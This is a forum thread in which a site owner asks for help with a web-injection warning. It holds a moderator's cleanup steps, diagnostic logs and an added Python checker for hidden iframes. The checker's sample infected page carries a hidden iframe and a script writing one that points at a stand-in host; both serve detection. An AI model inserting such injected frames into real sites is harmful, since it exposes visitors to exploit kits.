"Web Attack: Cookie Bomb Injection Website" message when going to my web site


11 replies to this topic

#1 cinerama

  • Members
  • 83 posts

Posted 22 March 2014 - 10:41 AM

Hello,
 
I'm seeing the error message  "Norton blocked an attack by: Web Attack: Cookie Bomb Injection Website" when going to specific pages like h00p://incinerama.com/1957_january.htm on my web site h00p://incinerama.com . I ran Malwarebytes on the computer that uploads the files to the web site and it found no errors. Please help!
 
Thanks!
 
Roland



Mod edit:
Broke malicious site links ~~ boopme

Edited by boopme, 27 March 2014 - 01:29 PM.




#2 boopme

    To Insanity and Beyond

  • Global Moderator
  • 73,331 posts
  • Gender:Male
  • Location:NJ USA

Posted 27 March 2014 - 01:34 PM

Hello Cinerama

The infection creates a hidden iframe injected in websites, which upon visiting redirects the user to exploit kit hosted sites.

Let's scan and see if other exploits are here.

Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Users, Partitions and Memory size.
  • Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
    Note: When using "Reset FF Proxy Settings" option Firefox should be closed.



  • Download TDSSKiller and save it to your desktop.
  • Extract (unzip) its contents to your desktop.
  • Open the TDSSKiller folder and double-click on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is required, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here.

    ADW Cleaner

    Please download AdwCleaner by Xplode and save to your Desktop.
  • Double-click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.
  • -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on each one and uncheck any items you want to keep (except you cannot uncheck Chrome and Firefox preferences lines).


    Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

    Last, run ESET.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the ESET OnlineScan button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.exe icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
  • Scan potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE: Sometimes if ESET finds no infections it will not create a log.

How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook
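boopme's description of the injection (a hidden iframe added to the site's own pages that sends visitors on to an exploit-kit host) is something a site owner can check for in the local copy of the site before uploading it again. The checker below is an added example, not part of the thread and not one of the tools boopme lists; it is hypothetical, and the two sample pages and the bad.example host are constructed.

```python
"""Hidden-iframe audit for a static web site (hypothetical defender-side tool).

Flags <iframe> elements that are sized to be invisible, styled as hidden or
pushed off-screen, or that load content from a host other than the site's
own, and flags <script> blocks that build an iframe at run time. Running it
over the local copy of the site before uploading catches an injected frame
before it is published again.
"""
import os
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS fragments that make an element invisible to the visitor.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(?:left|top)\s*:\s*-\d{3,}px|opacity\s*:\s*0(?![.\d])",
    re.IGNORECASE,
)

def _is_tiny(value):
    """True when a width/height attribute resolves to 0 or 1 pixels."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return bool(m) and int(m.group(1)) <= 1

def _is_external(src, site_host):
    """True when src points at a host that is not the site or one of its subdomains."""
    host = (urlparse(src).hostname or "").lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)

class IframeAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._script = None  # collects <script> text while inside the tag

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
            return
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        if _is_tiny(a.get("width")) or _is_tiny(a.get("height")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden-style")
        src = a.get("src") or ""
        if _is_external(src, self.site_host):
            reasons.append("external-host")
        if reasons:
            self.findings.append(
                {"line": self.getpos()[0], "src": src, "reasons": reasons})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            text = "".join(self._script)
            self._script = None
            # Injected frames are often written by script so they are not
            # visible in the static markup; look for the tag name in the code.
            if re.search(r"<\s*iframe|createElement\(\s*['\"]iframe", text, re.I):
                self.findings.append(
                    {"line": self.getpos()[0], "src": "(built by script)",
                     "reasons": ["script-builds-iframe"]})

def audit_html(html, site_host):
    """Return a list of findings for one page's HTML."""
    p = IframeAuditor(site_host)
    p.feed(html)
    p.close()
    return p.findings

def audit_tree(root, site_host):
    """Audit every .htm/.html file under root; returns {path: findings}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".htm", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = audit_html(fh.read(), site_host)
                if found:
                    report[path] = found
    return report

# Constructed sample pages: a clean one and one carrying an injected frame.
SAMPLE_CLEAN = """<html><body><h1>January 1957</h1>
<iframe src="http://incinerama.com/nav.htm" width="300" height="200"></iframe>
</body></html>"""

SAMPLE_INJECTED = """<html><body><h1>January 1957</h1>
<iframe src="http://bad.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write('<iframe src="http://bad.example/x" width=0 height=0></iframe>');</script>
</body></html>"""

if __name__ == "__main__":
    if len(sys.argv) == 3:  # usage: audit.py <site-root-dir> <site-host>
        for path, found in audit_tree(sys.argv[1], sys.argv[2]).items():
            for f in found:
                print(f"{path}:{f['line']} {f['src']} {','.join(f['reasons'])}")
    else:
        print(audit_html(SAMPLE_INJECTED, "incinerama.com"))
```

A hit on "external-host" alone can be legitimate (an embedded video, for instance), so review each finding; "zero-size" or "hidden-style" combined with an unfamiliar host is the pattern described in the reply above.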

#3 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 27 March 2014 - 05:12 PM

MiniToolBox by Farbar  Version: 23-01-2014
Ran by Roland (administrator) on 27-03-2014 at 17:58:54
Running from "C:\Documents and Settings\Roland\Desktop"
Microsoft Windows XP Home Edition Service Pack 3 (X86)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.


========================= IE Proxy Settings: ==============================

Proxy is enabled.
ProxyServer: http=127.0.0.1:1044;https=127.0.0.1:1044;

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================

"network.proxy.type", 4

"Reset FF Proxy Settings": Firefox Proxy settings were reset.

Hosts file not detected in the default directory
========================= IP Configuration: ================================

Intel® PRO/100 VE Network Connection = Local Area Connection (Connected)


# ----------------------------------
# Interface IP Configuration         
# ----------------------------------
pushd interface ip


# Interface IP Configuration for "Local Area Connection"

set address name="Local Area Connection" source=dhcp
set dns name="Local Area Connection" source=dhcp register=PRIMARY
set wins name="Local Area Connection" source=dhcp


popd
# End of interface IP configuration




Windows IP Configuration

        Host Name . . . . . . . . . . . . : LYNNEROLAND
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Hybrid
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : hsd1.ct.comcast.net.

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : hsd1.ct.comcast.net.
        Description . . . . . . . . . . . : Intel® PRO/100 VE Network Connection
        Physical Address. . . . . . . . . : 00-16-76-7D-50-DB
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 10.0.0.3
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.0.0.1
        DHCP Server . . . . . . . . . . . : 10.0.0.1
        DNS Servers . . . . . . . . . . . : 75.75.75.75
                                            75.75.76.76
        Lease Obtained. . . . . . . . . . : Thursday, March 27, 2014 5:48:01 PM
        Lease Expires . . . . . . . . . . : Thursday, April 03, 2014 5:48:01 PM

Server:  cdns01.comcast.net
Address:  75.75.75.75

Name:    google.com
Addresses:  74.125.226.199, 74.125.226.192, 74.125.226.194, 74.125.226.198
      74.125.226.206, 74.125.226.200, 74.125.226.195, 74.125.226.197, 74.125.226.196
      74.125.226.193, 74.125.226.201

Pinging google.com [173.194.43.9] with 32 bytes of data:

Reply from 173.194.43.9: bytes=32 time=20ms TTL=54
Reply from 173.194.43.9: bytes=32 time=18ms TTL=54

Ping statistics for 173.194.43.9:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 18ms, Maximum = 20ms, Average = 19ms

Server:  cdns01.comcast.net
Address:  75.75.75.75

Name:    yahoo.com
Addresses:  98.138.253.109, 206.190.36.45, 98.139.183.24

Pinging yahoo.com [98.139.183.24] with 32 bytes of data:

Reply from 98.139.183.24: bytes=32 time=110ms TTL=49
Reply from 98.139.183.24: bytes=32 time=78ms TTL=49

Ping statistics for 98.139.183.24:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 78ms, Maximum = 110ms, Average = 94ms

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...00 16 76 7d 50 db ...... Intel® PRO/100 VE Network Connection - Packet Scheduler Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0         10.0.0.1        10.0.0.3      20
         10.0.0.0    255.255.255.0         10.0.0.3        10.0.0.3      20
         10.0.0.3  255.255.255.255        127.0.0.1       127.0.0.1      20
   10.255.255.255  255.255.255.255         10.0.0.3        10.0.0.3      20
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1      1
      169.254.0.0      255.255.0.0         10.0.0.3        10.0.0.3      20
        224.0.0.0        240.0.0.0         10.0.0.3        10.0.0.3      20
  255.255.255.255  255.255.255.255         10.0.0.3        10.0.0.3      1
Default Gateway:          10.0.0.1
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================

Catalog5 01 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog5 02 C:\WINDOWS\system32\winrnr.dll [16896] (Microsoft Corporation)
Catalog5 03 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Catalog9 01 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 02 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 03 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 04 C:\WINDOWS\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 05 C:\WINDOWS\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 06 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 07 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 08 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 09 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 10 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 11 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 12 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 13 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 14 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 15 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (02/22/2014 03:11:00 PM) (Source: MsiInstaller) (User: NT AUTHORITY)
Description: Product: Adobe Flash Player 12 Plugin -- Error 1722.There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action NewCustomAction1, location: C:\WINDOWS\TEMP\InstallPlugin_12_0_0_70.exe, command: -install -msi

Error: (11/29/2013 06:58:27 PM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (10/24/2013 05:34:34 PM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (10/17/2013 07:24:57 PM) (Source: Application Error) (User: )
Description: Faulting application pcmaticrt.exe, version 1.0.0.11, faulting module pcmaticrt.exe, version 1.0.0.11, fault address 0x00003510.
Processing media-specific event for [pcmaticrt.exe!ws!]

Error: (10/17/2013 05:29:43 PM) (Source: MsiInstaller) (User: LYNNEROLAND)
Description: Product: Apple Application Support -- A later version of Apple Application Support is already installed on this computer.

Error: (10/16/2013 05:55:57 PM) (Source: CltMngSvc) (User: )
Description: CltMngSvcServiceInstall: Fail to Start serviceSearch Protect by Conduit Updater (Error: 1056)

Error: (09/16/2013 04:32:48 PM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (09/16/2013 04:32:48 PM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (07/04/2013 07:17:25 PM) (Source: Application Hang) (User: )
Description: Hanging application Pip.exe, version 5.0.1.3410, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (04/28/2013 10:49:12 AM) (Source: MsiInstaller) (User: NT AUTHORITY)
Description: Product: Apple Application Support -- A later version of Apple Application Support is already installed on this computer.


System errors:
=============
Error: (03/27/2014 05:49:45 PM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/22/2014 11:07:58 AM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
IntelIde

Error: (03/22/2014 11:07:58 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/22/2014 11:06:26 AM) (Source: 0) (User: )
Description: 0xC0000001HarddiskVolume2

Error: (03/22/2014 09:38:33 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/22/2014 09:14:01 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/08/2014 10:43:36 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/02/2014 10:23:11 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/01/2014 07:33:12 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (02/22/2014 02:02:27 PM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126


Microsoft Office Sessions:
=========================

=========================== Installed Programs ============================

32 Bit HP CIO Components Installer (Version: 2.1.4)
7-Zip 4.65
7-Zip 9.20 (Version: 9.20.00.0)
Adobe AIR (Version: 4.0.0.1390)
Adobe Digital Editions
Adobe Download Manager (Version: 1.6.2.90)
Adobe Flash Player 12 ActiveX (Version: 12.0.0.77)
Adobe Flash Player 12 Plugin (Version: 12.0.0.77)
Adobe Reader XI (11.0.05) (Version: 11.0.05)
AnswerWorks 5.0 English Runtime (Version: 008.000.0003)
AOLIcon (Version: 1.00.0000)
Apple Application Support (Version: 2.3.6)
Apple Mobile Device Support (Version: 7.0.0.117)
Apple Software Update (Version: 2.1.2.120)
ATT-PRT22
ATT-RC Self Support Tool
Belarc Advisor 8.2 (Version: 8.2.6.0)
Bonjour (Version: 3.0.0.10)
BufferChm (Version: 110.0.180.000)
CAM UnZip 4.42
Cards_Calendar_OrderGift_DoMorePlugout (Version: 2.03.0000)
CCleaner (remove only)
Copy (Version: 110.0.180.000)
Coupon Printer for Windows (Version: 4.0)
Dell CinePlayer (Version: 3.0)
Dell Digital Jukebox Driver
Dell Driver Download Manager (Version: 1.0.0.0)
Dell Driver Reset Tool (Version: 1.02.0000)
Dell Support Center (Version: 2.0.07311)
Dell System Restore (Version: 2.00.0000)
DellSupport (Version: 6.0.3062)
Destination Component (Version: 110.0.0.0)
DeviceDiscovery (Version: 110.0.180.000)
DeviceManagementQFolder (Version: 1.00.0000)
Digital Content Portal (Version: 1.00.0000)
DJ_AIO_03_F4200_ProductContext (Version: 110.0.206.000)
DJ_AIO_03_F4200_Software (Version: 110.0.206.000)
DJ_AIO_03_F4200_Software_Min (Version: 110.0.206.000)
EarthLink setup files (Version: 2005.1.47.0)
EMCO MoveOnBoot
ESET Online Scanner v3
eSupportQFolder (Version: 1.00.0000)
Exterminate3 (Version: 1.0.0)
F4200 (Version: 110.0.206.000)
F4200_Help (Version: 110.0.206.000)
FileZilla Client 3.7.4.1 (Version: 3.7.4.1)
Free Online TV Player
getPlus®_dll
Google Desktop (Version: -)
Google Updater (Version: 2.4.2432.1652)
GPBaseService (Version: 110.0.180.000)
HiJackThis (Version: 1.0.0)
Hotfix 2050 for SQL Server 2000 ENU (KB948110) (Version: 1)
Hotfix 2055 for SQL Server 2000 ENU (KB960082) (Version: 1)
HP Photosmart Essential 2.5 (Version: 1.03.0000)
HP Smart Web Printing (Version: 4.0)
HP Update (Version: 4.000.009.002)
HPProductAssistant (Version: 110.0.180.000)
Intel® Extreme Graphics 2 Driver (Version: 6.14.10.4396)
Intel® PRO Network Adapters and Drivers
Intel® PROSet for Wired Connections (Version: 8.00.5000)
iTunes (Version: 11.1.3.8)
Java 7 Update 51 (Version: 7.0.510)
Java Auto Updater (Version: 2.1.9.8)
Java™ 6 Update 20 (Version: 6.0.200)
Learn2 Player (Uninstall Only)
LiveUpdate 2.6 (Symantec Corporation) (Version: 2.6.14.0)
Malwarebytes Anti-Malware version 1.75.0.1300 (Version: 1.75.0.1300)
MCU (Version: 1.00.0000)
Microsoft .NET Framework 1.1 (Version: 1.1.4322)
Microsoft .NET Framework 1.1 Security Update (KB2416447)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2 (Version: 2.2.30729)
Microsoft .NET Framework 3.0 Service Pack 2 (Version: 3.2.30729)
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729)
Microsoft FrontPage 2000 SR-1 (Version: 9.00.3821)
Microsoft Image Composer 1.5
Microsoft Office 2007 Service Pack 2 (SP2)
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000)
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Outlook 2003 with Business Contact Manager Update (Version: 2.0.5324.0)
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Small Business Edition 2003 (Version: 11.0.8173.0)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Picture It! Publishing 2001 (Version: 5.0.0.0000)
Microsoft Plus! Digital Media Edition Installer (Version: 1.1.0.3514)
Microsoft Plus! Photo Story 2 LE (Version: 1.1.0.3463)
Microsoft Silverlight (Version: 4.0.60310.0)
Microsoft Software Update for Web Folders  (English) 12 (Version: 12.0.6425.1000)
Microsoft SQL Server Desktop Engine (MICROSOFTSMLBIZ) (Version: 8.00.2039)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (Version: 8.0.50727.4053)
Microsoft Visual C++ 2005 Redistributable (Version: 8.0.56336)
Microsoft Works (Version: 08.05.0818)
Mozilla Firefox 27.0.1 (x86 en-US) (Version: 27.0.1)
Mozilla Maintenance Service (Version: 27.0.1)
MSN
MSXML 4.0 SP2 (KB927978) (Version: 4.20.9841.0)
MSXML 4.0 SP2 (KB936181) (Version: 4.20.9848.0)
MSXML 4.0 SP2 (KB954430) (Version: 4.20.9870.0)
MSXML 4.0 SP2 (KB973688) (Version: 4.20.9876.0)
Musicmatch® Jukebox (Version: 10.10.0097)
MyIdentityDefender Toolbar (CyberDefender Corporation) (Version: 5.05.21.03)
NetZeroInstallers (Version: 1.0.0)
OverDrive Media Console (Version: 3.1.0)
PC Matic 1.0.0.0 (Version: 1.0.0.8)
PC MaticRT 1.0.0.11 (Version: 1.0.0.11)
PC Pitstop Driver Alert 1.0 (Version: 1.0.0.1)
PC Pitstop Optimize2 2.0 (Version: 2.0.0.29)
PC Pitstop Optimize3 3.0 (Version: 3.0.0.18)
PCPitstop Panda AntiVirus Scan (remove only)
PowerDVD
PowerGrid (Version: 1.1.0154)
Product Key Finder 2011 (Trial) (Version: 1.1)
PRS-500 USB driver (Version: 1.0.00.08110)
PSSWCORE (Version: 2.03.0000)
Qualxserve Service Agreement (Version: 1.11.0000)
Quicken 2001 Basic
QuickTime (Version: 7.74.80.86)
Reader Library by Sony (Version: 3.3.00.07130)
Recover Keys (Version: 5.0.2.58)
Scan (Version: 11.0.0.0)
Search Assist (Version: 1.00.0000)
Shockwave
SmartWebPrinting (Version: 110.0.182.000)
SolutionCenter (Version: 110.0.180.000)
Sonic Activation Module (Version: 1.0)
Sonic Update Manager (Version: 3.0.0)
SpywareGuard v2.2 (Version: 2.2)
Status (Version: 110.0.180.000)
SUPERAntiSpyware (Version: 4.40.1002)
Toolbox (Version: 110.0.180.000)
TrayApp (Version: 110.0.180.000)
TurboTax 2008
TurboTax 2008 WinPerFedFormset (Version: 008.000.0341)
TurboTax 2008 WinPerProgramHelp (Version: 008.000.0219)
TurboTax 2008 WinPerReleaseEngine (Version: 008.000.0197)
TurboTax 2008 WinPerTaxSupport (Version: 008.000.1007)
TurboTax 2008 WinPerUserEducation (Version: 008.000.0433)
TurboTax 2008 wrapper (Version: 008.000.0065)
TurboTax 2009
TurboTax 2009 wctiper (Version: 009.000.0793)
TurboTax 2009 WinPerFedFormset (Version: 009.000.2881)
TurboTax 2009 WinPerReleaseEngine (Version: 009.000.0328)
TurboTax 2009 WinPerTaxSupport (Version: 009.000.0245)
TurboTax 2009 wrapper (Version: 009.000.0145)
TurboTax 2010
TurboTax 2010 wctiper (Version: 010.000.1308)
TurboTax 2010 WinPerFedFormset (Version: 010.000.5108)
TurboTax 2010 WinPerReleaseEngine (Version: 010.000.0501)
TurboTax 2010 WinPerTaxSupport (Version: 010.000.0219)
TurboTax 2010 wrapper (Version: 010.000.0157)
TurboTax Basic 2006
TurboTax Basic 2007
TurboTax ItsDeductible 2006 (Version: 10.00.0000)
Update for 2007 Microsoft Office System (KB967642)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (Version: 1)
Update for Microsoft Office OneNote 2007 (KB980729)
URL Assistant
VideoToolkit01 (Version: 110.0.171.000)
VLC media player 1.0.0 (Version: 1.0.0)
WebFldrs XP (Version: 9.50.7523)
WebReg (Version: 110.0.180.000)
Windows Driver Package - Intel (E100B) Net  (12/06/2007 8.0.47.0) (Version: 12/06/2007 8.0.47.0)
Windows Driver Package - Intel (FEIExpress) Net  (05/30/2009 9.0.12.0) (Version: 05/30/2009 9.0.12.0)
Windows Driver Package - Intel Corporation (ialm) Display  (09/20/2005 6.14.10.4396) (Version: 09/20/2005 6.14.10.4396)
Windows Driver Package - Sony Corporation (PRSUSB) USB  (08/08/2006 1.0.03.08080) (Version: 08/08/2006 1.0.03.08080)
Windows Genuine Advantage Notifications (KB905474) (Version: 1.7.0018.5)
Windows Genuine Advantage Validation Tool (KB892130)
Windows Genuine Advantage Validation Tool (KB892130) (Version: 1.7.0069.2)
Windows Installer 3.1 (KB893803)
Windows Internet Explorer 8 (Version: 20090308.140743)
Windows Media Format 11 runtime
Windows Media Player 10 (Version: 9.00.3636)
Windows Media Player 11
Windows XP Service Pack 3 (Version: 20080414.031525)
WinRAR archiver
Yahoo! Install Manager
Yahoo! Search Protection
Yahoo! Software Update
Yahoo! Toolbar

========================= Memory info: ===================================

Percentage of memory in use: 37%
Total physical RAM: 509.98 MB
Available physical RAM: 320.19 MB
Total Pagefile: 1243.02 MB
Available Pagefile: 1076.02 MB
Total Virtual: 2047.88 MB
Available Virtual: 1978.79 MB

========================= Partitions: =====================================

1 Drive c: () (Fixed) (Total:52.71 GB) (Free:24.46 GB) NTFS
2 Drive d: (Backup) (Fixed) (Total:18.29 GB) (Free:18.23 GB) NTFS

========================= Users: ========================================

User accounts for \\LYNNEROLAND

Administrator            Guest                    HelpAssistant            
Lynne                    Roland                   SUPPORT_388945a0         


**** End of log ****
 



#4 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 27 March 2014 - 05:21 PM

I downloaded TDSSKiller and ran it, but it found 0 threats.



#5 cinerama

  • Topic Starter
  • Members
  • 83 posts

Posted 27 March 2014 - 06:19 PM

# AdwCleaner v3.022 - Report created 27/03/2014 at 18:40:18
# Updated 13/03/2014 by Xplode
# Operating System : Microsoft Windows XP Service Pack 3 (32 bits)
# Username : Roland - LYNNEROLAND
# Running from : C:\Documents and Settings\Roland\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\Documents and Settings\All Users\Application Data\Conduit
Folder Deleted : C:\Documents and Settings\All Users\Application Data\WeCareReminder
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\Optimizer Pro
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\WINDOWS\system32\ARFC
Folder Deleted : C:\WINDOWS\system32\jmdp
Folder Deleted : C:\WINDOWS\system32\WNLT
Folder Deleted : C:\Documents and Settings\Roland\Local Settings\Application Data\Conduit
Folder Deleted : C:\Documents and Settings\Roland\Local Settings\Application Data\visi_coupon
Folder Deleted : C:\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5
Folder Deleted : C:\Documents and Settings\Roland\Application Data\DefaultTab
Folder Deleted : C:\Documents and Settings\Roland\Application Data\HELPER
Folder Deleted : C:\Documents and Settings\Roland\Application Data\SearchProtect
Folder Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\CT3314312
Folder Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
